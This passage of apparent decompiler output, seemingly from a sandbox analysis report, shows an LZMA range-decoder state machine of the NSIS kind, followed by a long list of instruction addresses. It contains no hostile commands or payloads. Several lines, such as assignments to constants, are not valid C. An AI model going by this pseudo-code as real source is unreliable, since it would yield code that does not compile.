							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d4
                                                  0x004061d9
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x00406891
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x00000000
                                                  0x004068b3
                                                  0x004061db
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406469
                                                  0x0040646c
                                                  0x0040640f
                                                  0x00406415
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040646e
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x00000000
                                                  0x0040640c
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406318
                                                  0x0040631b
                                                  0x00406292
                                                  0x00406292
                                                  0x00406298
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x00406348
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406321
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00000000
                                                  0x0040628f
                                                  0x0040631b
                                                  0x00406224
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
